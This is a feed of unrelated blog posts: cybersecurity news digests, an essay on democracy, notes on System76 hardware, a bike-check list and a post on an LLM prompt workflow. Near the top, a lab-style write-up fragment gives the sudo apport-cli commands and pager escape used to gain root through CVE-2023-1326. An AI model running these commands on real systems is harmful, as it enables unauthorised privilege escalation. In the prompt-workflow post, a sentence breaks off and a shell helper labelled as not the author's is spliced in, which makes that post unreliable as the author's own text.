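Cost 10 is the default many frameworks shipped with for years; the point of the check is that a dictionary word like whatever1 or tequieromucho falls to rockyou at any cost, so raising the work factor buys time only for users whose passwords are not already on a list. Both measures belong together: a minimum cost on storage and a breached-password check on the way in.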

User Enumeration

Running sudo -l shows that logan is allowed to run apport-cli using sudo. A quick search on how to abuse this shows that we might be able to abuse CVE-2023-1326 to gain root privileges.

I just wanted to be sure that apport doesn't crash or something, so I first generated a valid crash report.

sudo /usr/bin/apport-cli -f --pid 17932 --save /var/crash/ex.crash && 
sudo /usr/bin/apport-cli -c /var/crash/ex.crash
!/bin/bash

We are now root.


from 📰wrzlbrmpft's cyberlights💥

A weekly shortlist of cyber security highlights. The short summaries are AI generated! If something is wrong, please let me know!


News For All

🧑‍💻 Double Dipping Cheat Developer Gets Caught Red-Handed security research – EvolvedAim cheat developer includes information stealer, targeting Escape From Tarkov players, double-dipping into profits, and causing significant damage. https://www.cyberark.com/resources/threat-research-blog/double-dipping-cheat-developer-gets-caught-red-handed

🔂 Anyone can Access Deleted and Private Repository Data on GitHub security research – GitHub exposes deleted and private repository data, posing security risks through Cross Fork Object Reference (CFOR) vulnerability. https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github

👻 A Hacker ‘Ghost’ Network Is Quietly Spreading Malware on GitHub security research – A network of 3,000 'ghost' accounts on GitHub spreading ransomware and info stealers using fake likes and shares. https://www.wired.com/story/github-malware-spreading-network-stargazer-goblin/

🗳️ Understanding the Election Cybersecurity Landscape cyber defense – The election cybersecurity landscape is complex, with diverse targets, tactics, and actors; understanding it is essential for safeguarding democracy. https://www.greynoise.io/blog/understanding-the-election-cybersecurity-landscape

💰 Oracle coughs up $115M to make privacy case go away privacy – Oracle settles $115 million class action lawsuit over alleged misuse of user data, promising privacy improvements. https://www.theregister.com/2024/07/22/oracle_settles_privacy_case/

📲 Telegram 0-day allowed sending malicious APKs disguised as videos security news – ESET discovers Telegram Android zero-day exploit EvilVideo, allowing attackers to send malicious APKs disguised as videos. https://securityaffairs.com/166042/hacking/evilvideo-telegram-android-zero-day.html

🎲 Chinese ‘cybercrime syndicate’ behind gambling sites advertised at European sporting events cybercrime – Infoblox uncovers Chinese cybercrime syndicate Vigorish Viper behind illegal global gambling network connected to human trafficking and cyber fraud. https://therecord.media/chinese-cybercrime-syndicate-gambling-football-europe

🍪 Google abandons plan to drop third-party cookies in Chrome privacy – Google is opting for user choice between Privacy Sandbox and cookies amidst concerns of competitive distortion. https://www.theregister.com/2024/07/23/google_cookies_third_party_continue/

📲 iOS 17: Domains contacted by an iPhone privacy https://www.kuketz-blog.de/ios-17-von-einem-iphone-kontaktierte-domains/

🥶 Simple ‘FrostyGoop’ malware responsible for turning off Ukrainians’ heat in January attack security research – Simple but impactful FrostyGoop malware uses Modbus protocol to disrupt heating in Ukrainian apartment buildings, showcasing attackers' focus on critical infrastructure. https://cyberscoop.com/frostygoop-ics-malware-dragos-ukraine/

💥 Inside the 78 minutes that took down millions of Windows machines security news – A faulty update by cybersecurity company CrowdStrike caused global Windows crashes, affecting millions of machines due to a driver flaw. Prospects to avoid such tech disasters involve enabling intelligent boot logic and limiting third-party kernel access. https://www.theverge.com/2024/7/23/24204196/crowdstrike-windows-bsod-faulty-update-microsoft-responses

🪼 AI-Powered Voice Spoofing for Next-Gen Vishing Attacks security research – AI-powered voice cloning advancements enable more realistic vishing attacks, posing significant security risks. Mandiant Red Team incorporated AI voice spoofing in testing, showcasing attackers' potential to exploit this technique for initial access, lateral movement, and privilege escalation. Security defenses must adapt through identifying inconsistencies, source verification, and implementing audio protection measures. https://cloud.google.com/blog/topics/threat-intelligence/ai-powered-voice-spoofing-vishing-attacks/

🤑 TracFone to pay $16 million to settle FCC cyber and privacy investigation security news – TracFone Wireless, owned by Verizon, will pay a $16 million fine to settle an FCC investigation into data breaches caused by API vulnerabilities. The breaches exposed customer data, leading to privacy compromises, necessitating improved API security measures and overall information security protocols. https://therecord.media/tracfone-16-million-to-settle-fcc-investigation

🗺️ Friendly Domain Registry “.top” Put on Notice security news – ICANN has issued a warning to the .top domain registry, expressing concerns over its failure to address phishing reports and suspend abusive domains, with reports showing .top domains were popular choices for phishing websites. https://krebsonsecurity.com/2024/07/phish-friendly-domain-registry-top-put-on-notice/

🎰 Philippines to end online casinos, maybe scams too cybercrime – The Philippines aims to shut down online gambling providers embroiled in crimes like tax evasion and human trafficking. Despite economic benefits, the industry faces international pressure due to illicit activities such as scams and exploitation. https://www.theregister.com/2024/07/24/phillipines_bans_online_gambling_operators/

🦸 Google's reCAPTCHA v2 just labor exploitation, boffins say security research – Researchers criticize Google's reCAPTCHA v2, suggesting it exploits human labor without providing significant security benefits, raising concerns about information harvesting and user experience. https://www.theregister.com/2024/07/24/googles_recaptchav2_labor/

🚸 School in hot water over facial recognition in canteen privacy – ICO reprimands a UK school for introducing facial recognition for canteen payments without proper assessments, consent, or consultation, highlighting the importance of data protection in new technologies at educational institutions. https://www.theregister.com/2024/07/24/essex_school_facial_recognition/

🧪 CrowdStrike blames test software for taking down 8.5 million Windows machines security news – CrowdStrike attributes the issue that caused 8.5 million Windows machines to crash to a bug in their test software that failed to properly validate a content update, leading to detailed post-incident corrective measures for improved testing and deployment processes. https://www.theverge.com/2024/7/24/24205020/crowdstrike-test-software-bug-windows-bsod-issue

🍆 SEXi / APT Inc Ransomware – What You Need To Know cybercrime – The SEXi ransomware group targets VMware ESXi servers, encrypting virtual machine-related files and demanding high ransoms. Victims' files are appended with '.SEXi' and a ransom note named SEXi.txt is left. No known weaknesses exist for data recovery. Protection includes updating systems, disabling default accounts, and using strong, unique passwords. https://www.tripwire.com/state-of-security/sexi-apt-inc-ransomware-what-you-need-know

🎮 LummaC2 Malware Abusing the Game Platform 'Steam' security research – LummaC2 malware disguised as illegal programs uses SEO poisoning and abuse of Steam to acquire C2 domains, targeting wallets, browsers, extensions, and more. https://asec.ahnlab.com/en/68309/


Some More, For the Curious

🔭 Astronomers discover technique to spot AI fakes using galaxy-measurement tools security research – University of Hull researchers use astronomy tools to detect AI-generated deepfake images by analyzing eye reflections for inconsistencies. https://arstechnica.com/information-technology/2024/07/astronomers-discover-technique-to-spot-ai-fakes-using-galaxy-measurement-tools/

🙋‍♂️ Ransomware takedowns leave crims scrambling for stability security news – Europol reports ransomware landscape fragmentation post RaaS disruptions, with criminals adapting by working independently or developing own payloads. https://www.theregister.com/2024/07/22/europol_says_ransomware_takedowns_make/

⛔ DDoS-for-hire site DigitalStress taken down by police, suspected owner arrested cybercrime – DDoS-for-hire site DigitalStress taken down by police, data collected from users, suspected owner arrested in Northern Ireland. https://www.bitdefender.com/blog/hotforsecurity/ddos-for-hire-site-digitalstress-taken-down-by-police-suspected-owner-arrested/

💼 Cyber firm KnowBe4 hired a fake IT worker from North Korea security news – KnowBe4 discovered a North Korean threat actor posing as a remote IT worker through an elaborate deception involving stolen identities and AI-augmented imagery, prompting an investigation and alerting authorities as part of the response. https://cyberscoop.com/cyber-firm-knowbe4-hired-a-fake-it-worker-from-north-korea/

🏝️ Unfashionably secure: why we use isolated VMs cyber defense – Canary's security architecture relies on isolated VMs for complete customer data separation, safeguarding against unauthorized access and ensuring individual tenant privacy, despite operational drawbacks. https://blog.thinkst.com/2024/07/unfashionably-secure-why-we-use-isolated-vms.html

🥼 Build a Home Lab: Equipment, Tools, and Tips cyber defense – Building a home lab with virtual machines allows for experimentation and learning in a safe environment, emphasizing the importance of commitment over expensive equipment. Fundamental components include network setup, virtual machines, and physical hardware, and key considerations include VM options, equipment needs, and backup strategies. https://www.blackhillsinfosec.com/build-a-home-lab-equipment-tools-and-tips/

🪖 North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs cybercrime – North Korea's Andariel cyber group targets aerospace, nuclear, and defense industries for espionage, using ransomware to fund operations. Known for sophisticated reconnaissance, custom and commodity malware, system manipulation, credential theft, lateral movement, and data exfiltration. https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a

🌊 Zero Day Initiative — Multiple Vulnerabilities in the Deep Sea Electronics DSE855 security research – ZDI reported multiple vulnerabilities in the Deep Sea Electronics DSE855; the vendor did not respond, leading to zero-day disclosure in June. A lack of authentication on the configuration backup allowed unauthorized access. https://www.thezdi.com/blog/2024/7/25/multiple-vulnerabilities-in-the-deep-sea-electronics-dse855

🔐 Secure Boot is completely broken on 200+ models from 5 big device makers vulnerability – Cryptographic key underpinning Secure Boot compromised in 2022, allowing an unlimited bypass on over 200 device models from major manufacturers. Serious doubts raised about the integrity of Secure Boot. https://arstechnica.com/security/2024/07/secure-boot-is-completely-compromised-on-200-models-from-5-big-device-makers/

🗣️ Microsoft calls for Windows changes and resilience after CrowdStrike outage security news – Microsoft calls for Windows changes for resilience after CrowdStrike outage, considering restricting kernel access for security vendors. https://www.theverge.com/2024/7/26/24206719/microsoft-windows-changes-crowdstrike-kernel-driver

💉 French authorities launch disinfection operation to eradicate PlugX malware from infected hosts security news – French authorities and Europol conduct a 'disinfection operation' against PlugX malware, addressing espionage activities with insights from a cybersecurity firm. https://securityaffairs.com/166213/cyber-crime/plugx-malware-disinfection-operation.html


CISA Corner

🧑‍🏭 CISA Releases Four Industrial Control Systems Advisories vulnerability – CISA issues advisories on current ICS security issues for National Instruments and Hitachi products. https://www.cisa.gov/news-events/alerts/2024/07/23/cisa-releases-four-industrial-control-systems-advisories

🧑‍🏭 CISA Releases Two Industrial Control Systems Advisories vulnerability – CISA issued advisories for Siemens SICAM and Positron Broadcast Signal Processor. https://www.cisa.gov/news-events/alerts/2024/07/25/cisa-releases-two-industrial-control-systems-advisories

⚠️ CISA Adds Two Known Exploited Vulnerabilities to Catalog vulnerability – CISA adds two known exploited vulnerabilities to its catalog: CVE-2012-4792 affecting Microsoft Internet Explorer and CVE-2024-39891 affecting Twilio Authy. https://www.cisa.gov/news-events/alerts/2024/07/23/cisa-adds-two-known-exploited-vulnerabilities-catalog

🔒 ISC Releases Security Advisories for BIND 9 security news – ISC released BIND 9 security advisories addressing vulnerabilities that can lead to denial-of-service attacks. https://www.cisa.gov/news-events/alerts/2024/07/24/isc-releases-security-advisories-bind-9

 

from Sirius

Engendered by enemies of democracy, the construct of the “dictatorship of the majority” persists as the foundation of an increasingly technocratic, authoritarian and oligarchic society.

Nineteenth-century painting by Philipp Foltz depicting the Athenian statesman Pericles delivering his famous funeral oration before the Assembly

Since Plato, and on through John Adams, Tocqueville, Stuart Mill, Lord Acton, etc., democracy has been accused of being reckless and vulnerable, and of oppressing minorities through a supposed tyranny of the majority.

To begin, we need to understand how democracy was formed and what its foundations are.

The historiographical consensus tells us that, since the first democratic experiment, around 508 BC, in the city-state of Athens, as implemented by the reforms of Cleisthenes, there was the drawing of lots among citizens to fill government posts (to perform administrative and judicial functions) and the participation of all eligible citizens in a legislative assembly, in the votes or deliberations that established the laws of the polis.

Although democracy is “the rule of the people”, it is not to be confused with ochlocracy, the rule of the mob. The former concerns citizens' participation in decision-making and law-making; the latter, the imposition of the will of the crowd over the law.

Democracy can be understood as a form of government opposed to autocracy (power concentrated in the hands of one individual, whether monarch or tyrant) and to the rule of the few (aristocracy or oligarchy).

Being the antithesis of concentrated, authoritarian power, democracy has liberty, opposition to oppression, as its principal foundation.

Equality in democracy is not, and never was, an illusion that people are substantially equal, but the affirmation of the principle that no citizen is greater or better than the others, such that he could be authorized to impose his will and arbitrary judgment on society.

It is important to give historical context and to stress that by citizen we are not speaking of everyone, since in Athenian society, misogynistic and slaveholding, slaves and women, as well as foreigners, were not considered citizens.

I transcribe here some excerpts from the famous funeral oration that Pericles was chosen by the citizens to deliver, as narrated by Thucydides, which express the incipient characteristics of that democracy:

We live under a form of government that is not based on the institutions of our neighbours; on the contrary, we serve as a model for some rather than imitating others. Its name, since everything depends not on the few but on the majority, is democracy. In it, while with regard to the laws all are equal for the settlement of their private disputes, when it comes to choosing (if distinctions must be made in any field), it is not membership of a class but merit that gives access to the most honourable posts; conversely, poverty is no reason for someone who is able to render service to the city to be prevented from doing so by the obscurity of his condition. (...) At the same time that we avoid offending others in our private dealings, in our public life we keep away from lawlessness chiefly out of a reverent fear, for we are obedient to the authorities and to the laws, especially those enacted to aid the oppressed and those which, though unwritten, bring upon transgressors a dishonour visible to all. (...) We are lovers of beauty without extravagance and lovers of philosophy without indolence. We use wealth more as an opportunity for action than as a ground for boasting; among us there is no shame in poverty, but the greatest shame is in not doing what one can to escape it. One will see in the same person at once an interest in private and in public affairs, and in others among us who devote themselves mainly to business one will see no lack of discernment in political matters, for we regard the man who stands aloof from public affairs not as one who minds his own business but as useless; we, citizens of Athens, decide public questions ourselves, or at least strive to understand them clearly, in the belief that it is not debate that is a hindrance to action, but rather not being enlightened by debate before the time for action arrives.
We consider ourselves superior to other men in another respect as well: we are bold to act, but at the same time we like to reflect on the risks we intend to run, whereas for other men boldness means ignorance and reflection brings hesitation. Those should rightly be judged the most courageous who, perceiving clearly both the sufferings and the satisfactions inherent in an action, nonetheless do not shrink from danger. (...) our city, as a whole, is the school of all Hellas and, it seems to me, each man among us could, by his own personality, show himself self-sufficient in the most varied forms of activity, with the greatest elegance and ease. And this is no mere boasting inspired by the occasion, but real truth, attested by the very power of our city, acquired as a consequence of these qualities. (...) We have already given many proofs of our power, and certainly there is no lack of witnesses to it; we shall therefore be admired not only by the men of today but also by those of the future. We have no need of a Homer to sing our glories, nor of any other poet whose verses may perhaps delight for the moment but whose version of the facts will be discredited by reality. We have compelled every sea and every land to give passage to our daring, and everywhere we have planted imperishable monuments of the evils and the goods we have done.

We see, therefore, that democracy, contrary to what its detractors claim, is not a social form that despises philosophy, knowledge and respect for the law in order to satisfy the irrational desires of uncontrolled masses. On the contrary, it demands debate, active participation and reflection from all citizens. In Pericles' words, it seems closer to a social regime in which rationality is exercised than to some aristocracy in which political deliberation and law-making are the task of only a few sages.

Democracy develops through history with the aim of providing for the internal and external survival of the social group, incorporating, among other things, the ideals of the Enlightenment in the eighteenth century.

Rousseau, in “The Social Contract”, understood democracy as the ideal regime, which consisted of the following:

(...) a form of association that defends and protects every member belonging to it, and in which the individual, even while uniting with all the others, obeys only himself and remains free.

Thus, democracy has a legalistic character. In it, the rules, or laws, determine the procedures for making decisions that bind the whole body of members.

There is recognition of plurality, so that from the majority one presumes one or more minorities, equally protected, with inalienable individual liberties.

Norberto Bobbio points out the following:

The liberal state and the democratic state are interdependent in two ways: in the direction that runs from liberalism to democracy, in the sense that certain liberties are necessary for the correct exercise of democratic power, and in the opposite direction, which runs from democracy to liberalism, in the sense that democratic power is necessary to guarantee the existence and persistence of fundamental liberties.

In the passage above, it should be stressed, Bobbio refers to political liberalism (individual liberties: life, opinion, expression, association, assembly, etc.), which differs, for example, from the ideas of the extreme economic liberalism (laissez faire) defended by ancaps and neoliberals (just to be clear).

Therefore, since democracy means opposition to all forms of authoritarian government and is founded on liberty and plurality, it necessarily safeguards individual liberties, and it is not possible, against the rules of the democratic game, to invoke a supposed dictatorship of the majority to assault the liberties of minorities.

When we see a leader who was elected and authorized by the very rules of democracy to preside over a country (you probably have a recent example in mind) saying that “minorities have to bow to majorities”, he is not defending a democratic rule; he is claiming an authority he does not possess (because it contradicts the democratic Constitution to which he is subject, which guarantees individual liberties to minorities) and seeking power contrary to the law, and therefore against democratic rules, seeking backing in the masses, as if he were a tyrant installed by an ochlocracy.

Democracy does not allow a tyrant to consider himself the holder of the power of the masses and to act against the liberty of individuals and minorities, especially in a direct democracy.

In a democracy, laws act as an element that restricts the power of state authorities, and institutions are erected that act to guard the elementary liberties of citizens.

Other characteristics that stem from democracy being the antithesis of autocracy are the requirement of transparency and publicity in its manifestations, as a true regime of the visibility of power, admitting no secrecy with regard to decisions that affect the collectivity, as well as its anti-elitist character, even where technical decisions are concerned.

As Jacques Rancière aptly observed in “Hatred of Democracy”, democracy does not bow to any authority; it has a character of scepticism and, why not, insolence, so that even if a democratic regime in our times requires a technical administration, that administration will not issue hermetic decisions: the specialists must submit the grounds of their technical decisions to public scrutiny, so that society can inform itself and, where appropriate, debate, question and control the actions of these agents.


#Democracia #Política #DitaduraDaMaioria #FilosofiaPolítica

 

from Tai Lam in Science

There probably hasn't been much concrete and confirmed info about the upcoming Virgo laptop from System76. There's some more, but I wanted to get into the basics, and then I can follow up later, as this will be out of date anyways once Virgo is officially released.

Louis Rossmann made a video on Virgo in mid-July 2023. However, not all the details he discussed were correct, according to the paper. Whatever applicable software and firmware there is will use GPLv3, but the hardware will use the strongly reciprocal version of the CERN Open Hardware Licence (CERN-OHL-S).

Bryan Lunduke also made a video about Virgo in late July 2023. Lunduke's reporting had more accurate details. (Yes, I know Lunduke has gone off the deep end, but he is one of the few people online who can accurately report on Virgo.)

Virgo's project files can be found on System76's GitHub repo.

There hasn't been much activity since 2023. I suppose it's because System76 has been preparing to release its Rust-based COSMIC desktop environment (DE) in 2024. The alpha should be released in August 2024... is it August 8th? (I believe this is true? However, I can't seem to find the date anymore. Maybe I should listen to episode 10 of the System76 podcast...)

 

from Tai Lam on a Bike

I'm saving documents regarding the groundwater approach to racism. This might be useful for group usage later, or might not be.

  • Racial Equity Institute's groundwater approach to racism document
  • 4 types of racism document, from the City of Seattle
  • “6 Signs of Internalized Racism” article from disorient.co
    • Only available on the Wayback Machine
 

from Tai Lam on a Bike

(Originally written for another purpose)

Do you know your ABCs of bike checks?

Air

  • Find pressure reading on air pump
    • Read the pressure on the tire, inflate to halfway
      • Too close to the smallest number will not last very long
      • Too high can cause inner tube to break
  • If no pressure reading, then inflate until
    • Tires need a lot more air than you

Brakes

  • Rim brakes should engage easily
  • Adjust so that there is a distance of 1 thumb to the handlebar when stopping

Chains (also crank and cassette)

  • Chain should move easily, avoid stuck links or rust
  • Cranks should not move left/right
  • Cassette (the gearing on the back wheel) should be free to move

Seat height

  • Hip height
  • Tip: to stop and stand, lean the bike
    • Seems a bit scary, but this height check lets you pedal better

Quickly: test ride

  • Take a very short ride to see if everything is good
  • Try to stay nearby, so that you can come back quickly if anything goes wrong

Last things

  • Can you store your bike inside?
    • It's ok if you ride in the rain for a bit.
      • Just make sure to dry your bike when you get back inside at home.
  • If you can, it's best to store your bike inside.
    • That way, your chain can stay clean and your bike lasts longer.
 

from Tai Lam in Science

Here are some links regarding the COSMIC desktop environment (DE) from System76 and desktop apps being designed with the COSMIC framework in mind.

 

from Kevin Neely's Security Notes

Automatically creating new content from old

You know what I hate? Repetition. Still, a difficult lesson that I’ve learned, through both experience and discussions with experts in marketing, is that repetition is the key to getting one’s message across. I like to believe that a single, coherent and cogent conveyance of thought is all it takes to deliver, for example, a new security model or change in policy, or whatever. In reality, the propagator of the message –in this case, the security team– has to deliver the message, announce it a second time, send an email, post a document on the intranet, have more meetings with the same people, make sure to cover the topic in various 1:1 meetings, etc. etc. ad infinitum.

And that is why I have been working with Daniel Miessler’s fabric framework to devise a prompt that can take variations of the same messaging and create new, yet fresh, versions of the same message. So far, the following prompt definition has been pretty strong in creating new content from old ideas.

My typical approach is to run the same prompt through multiple #LLM models:

cat examples.md | fabric --model gemma2:latest -sp create_similar

Interestingly, in a couple test runs with different example files, I found that #OpenAI’s models under-performed the open source models I used via #ollama. To be clear, this is uncommon. Most of the #fabric prompts appear to be tuned for –or at least work better with– OpenAI models. With this particular prompt, this was not the case. No matter; my approach to using genAI and LLMs is to run a prompt and content through multiple inference servers, models, and even different temperatures in order to create a collection of data that I can then hand-mold into something usable[^1].

Fabric Prompt

Here are the system.md contents of the fabric “create_similar” prompt:

# INPUT

INPUT:

# IDENTITY and PURPOSE

You are an advanced analytical AI adept at extracting specific points from many examples, identifying similarities and differences, synthesizing what works best, and then creating a similar but much much better version of the example.  The input contains a number of examples of the type of content needing to be synthesized.  The first section titled "Purpose" describes the nature of the examples and indicates the topic and information to be conveyed.  Documents will be delineated with a title such as 'EXAMPLE 1' specifically calling out the beginning of a new document.  The end of each example is delineated with a footer such as 'EXAMPLE 1 END'.  Your objective is to understand the style and format of the document examples and create new similar content.

# STEPS

1. Review each document carefully, taking the time to extract and understand the primary points made in each one.
2. Compare and contrast the list of points from each document against the points made in the other documents.
3. Extract the key points made by the examples, taking particular note of similarities between them.
4. Output the results as specified in the output instructions.


# OUTPUT INSTRUCTIONS

Craft and create a new document using the format and style identified from the examples.  The output must be new and novel while keeping to the themes and style of the examples.  Do not use any language from the examples verbatim.

I have found that local models, such as gemma and llama3 work a bit better by putting the INPUT field
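As an added example, not Kevin Neely's own script and not part of fabric, here is a small POSIX shell helper that does the two mechanical parts of the workflow above: it wraps a set of example files in the Purpose section and the 'EXAMPLE n' / 'EXAMPLE n END' delimiters the prompt expects, and then fans the assembled input out over a list of models using the same `fabric --model … -sp create_similar` invocation shown earlier, writing one output file per model. The model names, file names and output directory are assumptions; the constructed example snippets in the usage comment are mine.

```shell
#!/bin/sh
# Added example (not from the original post). Assembles the input format the
# create_similar prompt describes and runs it through several models.
# Model and file names below are assumptions.

# build_examples PURPOSE_TEXT FILE...
# Prints a "Purpose" section followed by each file wrapped as
# "EXAMPLE n" ... "EXAMPLE n END", matching the delimiters named in system.md.
build_examples() {
    purpose="$1"
    shift
    printf '# Purpose\n%s\n\n' "$purpose"
    n=1
    for f in "$@"; do
        printf 'EXAMPLE %d\n' "$n"
        cat "$f"
        printf '\nEXAMPLE %d END\n\n' "$n"
        n=$((n + 1))
    done
}

# run_models INPUT_FILE OUTDIR MODEL...
# Feeds the same assembled input to every model and keeps each result in its
# own file so the variants can be compared and hand-molded afterwards.
run_models() {
    input="$1"
    outdir="$2"
    shift 2
    mkdir -p "$outdir"
    for model in "$@"; do
        # "gemma2:latest" -> "gemma2_latest" so the model name is a safe filename
        safe=$(printf '%s' "$model" | tr ':/' '__')
        fabric --model "$model" -sp create_similar < "$input" > "$outdir/$safe.md"
    done
}

# Usage (constructed sample; examples/*.md would hold past versions of one
# announcement, e.g. an MFA-enrollment reminder sent to staff):
#   build_examples "Remind staff of the MFA enrollment deadline" examples/*.md > input.md
#   run_models input.md out gemma2:latest llama3:latest
```

`build_examples` is kept separate from `run_models` so the assembled input can be inspected once, then reused unchanged across models, inference servers or temperatures.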

Purpose

Up top, I mentioned that it has taken me some time to learn that repetition is the requirement for conveying a message, and a longer time to put this into regular practice. This goes 3x for our individual contributor team members. Personally, I don’t like this because it feels inefficient, but ICs don’t do it because they are very busy, and re-visiting something takes away from closing out the next item in their queue. Nonetheless, repetition is paramount, so devising low-interaction methods to revisit is crucial for regular operations.

Footnotes

[^1]: I have a feeling that I could do most of the work faster if I simply did it by hand. However, running through multiple LLMs in this manner provides a bit of randomness, and helps me remain apprised on the state-of-the-art for this strange field of study.

 

from 📰wrzlbrmpft's cyberlights💥

A weekly shortlist of cyber security highlights. The short summaries are AI generated! If something is wrong, please let me know!


News For All

🌍 Data Broker Files: How data brokers sell our location data and jeopardise national security privacy – Data brokers sell German location data, jeopardizing privacy and national security, leading to calls for regulation and concerns about data misuse. https://netzpolitik.org/2024/data-broker-files-how-data-brokers-sell-our-location-data-and-jeopardise-national-security/#netzpolitik-pw

🪪 It's best to just assume you’ve been involved in a data breach somehow privacy – Multiple data breaches in 2024, including AT&T and Snowflake, imply personal data compromise. Recommendations include strong passwords, multi-factor authentication, fraud alerts. https://blog.talosintelligence.com/threat-source-newsletter-july-18-2024/

🔍 Data breach exposes millions of mSpy spyware customers data breach – Data breach at mSpy exposes millions of customers who purchased phone spyware apps over a decade, revealing emails, personal documents, and requests for surveillance without consent by various individuals including U.S. officials. https://techcrunch.com/2024/07/11/mspy-spyware-millions-customers-data-breach/

📱 The FBI says it has ‘gained access’ to the Trump rally shooter’s phone security news – The FBI has accessed the phone of the suspect who shot at a Trump rally without disclosing how, continuing analysis of electronic devices and urging the public for tips. https://www.theverge.com/2024/7/15/24199239/fbi-encryption-phone-trump-shooter-pennsylvania-gained-access

🧔‍♂️ Kaspersky leaves U.S. market following the ban on the sale of its software in the country security news – Kaspersky exits the U.S. market after a ban on its software due to national security risks posed by Russia. The company denies links to the Russian government and will shut down its U.S. operations by September. https://securityaffairs.com/165799/breaking-news/kaspersky-is-leaving-the-u-s-market.html

💰 AT&T ransom laundered through mixers, gambling services cybercrime – AT&T's $370,000 ransom is being laundered through cryptocurrency mixing platforms and gambling services, identified by TRM Labs. Money laundering tactics include using swap services and privacy coins, often employed by cybercriminals to hide the funds' origins. https://therecord.media/att-ransom-laundered-mixers-research

⛑️ Rite Aid says 'limited' cyber incident affected data of 2.2 million people data breach – Rite Aid reports a 'limited' cyber incident after a hacker impersonated an employee accessing purchase-related data. Law enforcement contacted, victims offered identity protection services. https://therecord.media/rite-aid-data-breach-2-million-people

🦠 Private HTS Program Continuously Used in Attacks malware – A threat actor has been distributing malware through the private home trading system (HTS) program named HPlus, replacing the NSIS installer with an MSI format installer and supporting remote assistance with AnyDesk. The malware includes Quasar RAT aimed at stealing personal data. https://asec.ahnlab.com/en/67969/

🪓 HardBit Ransomware – What You Need to Know malware – HardBit ransomware, a ransomware-as-a-service (RaaS), resurfaces with a new version, HardBit 4.0, focused on thwarting security researchers with passphrase protection and improved customization that caters to different criminal operator technical levels. https://www.tripwire.com/state-of-security/hardbit-ransomware-what-you-need-know

💦 Leaked Docs Show What Phones Cellebrite Can (and Can’t) Unlock security news – Cellebrite struggled to unlock a significant portion of modern iPhones as of April 2024, per leaked documents. https://www.404media.co/leaked-docs-show-what-phones-cellebrite-can-and-cant-unlock/

🏳️‍🌈 LGBTQ+ people in Middle East and North Africa subject to intense digital oppression, research finds privacy – LGBTQ+ individuals face intense digital oppression, with police using dating and social media apps for persecution. Research reveals high levels of violence, forced device searches, and abuse. https://therecord.media/lgbtq-mena-region-digital-harassment

🛜 Mobile internet and social media disrupted in Bangladesh amid student protests security news – Bangladesh orders a nationwide mobile internet shutdown amid violent student protests against a government job quota system. The disruption is linked to social media usage by protesters. https://therecord.media/bangladesh-mobile-internet-social-media-outages-student-protests

🏠 How a little-known tool is sweeping the real estate industry by giving instant access to vast amounts of homebuyer data security news – Forewarn app offers real estate professionals instant access to detailed data about prospective clients for a low fee. Although primarily marketed as a safety tool, it also provides financial and criminal records instantly. However, privacy concerns and potential for misusing the data exist despite its explosive adoption in the real estate industry. https://therecord.media/forewarn-app-real-estate-homebuyer-data

🏥 MediSecure data breach impacted 12.9 million individuals data breach – Australian digital prescription provider MediSecure suffered a ransomware attack exposing personal and health information of 12.9 million individuals. The breach resulted in the theft of 6.5TB of data impacting users between March 2019 and November 2023. https://securityaffairs.com/165932/uncategorized/medisecure-databreach-12-9m-individuals.html

Crowdstrike Corner

🚨 Global Microsoft Meltdown Tied to Bad Crowdstrike Update security news – Crowdstrike update causes global Windows system crashes; airports, hospitals, and businesses affected. Recovery may take time, requiring manual fix per machine. https://krebsonsecurity.com/2024/07/global-microsoft-meltdown-tied-to-bad-crowstrike-update/

🐦‍⬛ What is CrowdStrike, and what happened? security news – CrowdStrike caused a global outage after a faulty update to Windows machines, affecting essential services. The issue came from an update that caused Windows systems to crash. Recovery may take days to weeks. https://www.theverge.com/2024/7/19/24201864/crowdstrike-outage-explained-microsoft-windows-bsod

🛹 Threat actors attempted to capitalize CrowdStrike incident security news – Threat actors exploit CrowdStrike IT outage to distribute Remcos RAT malware in a Latin America-targeted campaign under the disguise of an emergency fix via a ZIP file named 'crowdstrike-hotfix.zip.' CrowdStrike provides IOCs for the malicious campaign. https://securityaffairs.com/165953/uncategorized/threat-actors-capitalize-crowdstrike-incident.html


Some More, For the Curious

➿ CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks security research – CVE-2024-38112 used by Void Banshee to exploit IE vulnerability, leading to Atlantida stealer deployment against Windows users. https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html

🖼️ Fake AWS Packages Ship Command and Control Malware In JPEG Files security research – Fake AWS npm packages hide command and control malware in JPEG images, jeopardizing package installations and highlighting the need for increased vigilance in open source ecosystems. https://blog.phylum.io/fake-aws-packages-ship-command-and-control-malware-in-jpeg-files/

0️⃣ Zero Day Initiative – Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD security news – Gap in coordinated vulnerability disclosure leads to lack of vendor transparency, disputes on severity ratings, and challenges in bug reporting, highlighting the importance of improved communication and accountability within the cybersecurity industry. https://www.thezdi.com/blog/2024/7/15/uncoordinated-vulnerability-disclosure-the-continuing-issues-with-cvd

🥴 Weak Security Defaults Enabled Squarespace Domains Hijacks – Krebs on Security security news – Weak security defaults at Squarespace allowed domain hijacking incidents targeting cryptocurrency businesses, with vulnerabilities arising from the migration process from Google Domains, lack of email verification for new accounts, and limited control over account access and activity. https://krebsonsecurity.com/2024/07/researchers-weak-security-defaults-enabled-squarespace-domains-hijacks/

🃏 Punch Card Hacking – Exploring a Mainframe Attack Vector security research – Article explores using punch card concepts in mainframe hacking for penetration testing, detailing JCL basics, FTP job submission, debugging with spool files, and potential privilege escalation. https://blog.nviso.eu/2024/07/16/punch-card-hacking-exploring-a-mainframe-attack-vector/

👻 ‘GhostEmperor’ returns: Mysterious Chinese hacking group spotted for first time in two years cybercrime – After a two-year hiatus, the sophisticated Chinese hacking group GhostEmperor, known for supply-chain attacks in Southeast Asia, has reappeared, deploying a rootkit to evade detection and carrying out attacks on business partners as seen in a recent incident investigated by cybersecurity company Sygnia. https://therecord.media/ghostemperor-spotted-first-time-in-two-years

🧑‍💼 Vulnerability in Cisco Smart Software Manager lets attackers change any user password vulnerability – Cisco Smart Software Manager On-Prem vulnerability (CVE-2024-20419) allows unauthorized users to change any user's password, posing a severe security risk with a maximum CVSS score of 10. https://arstechnica.com/security/2024/07/vulnerability-in-cisco-smart-software-manager-lets-attackers-change-any-user-password/

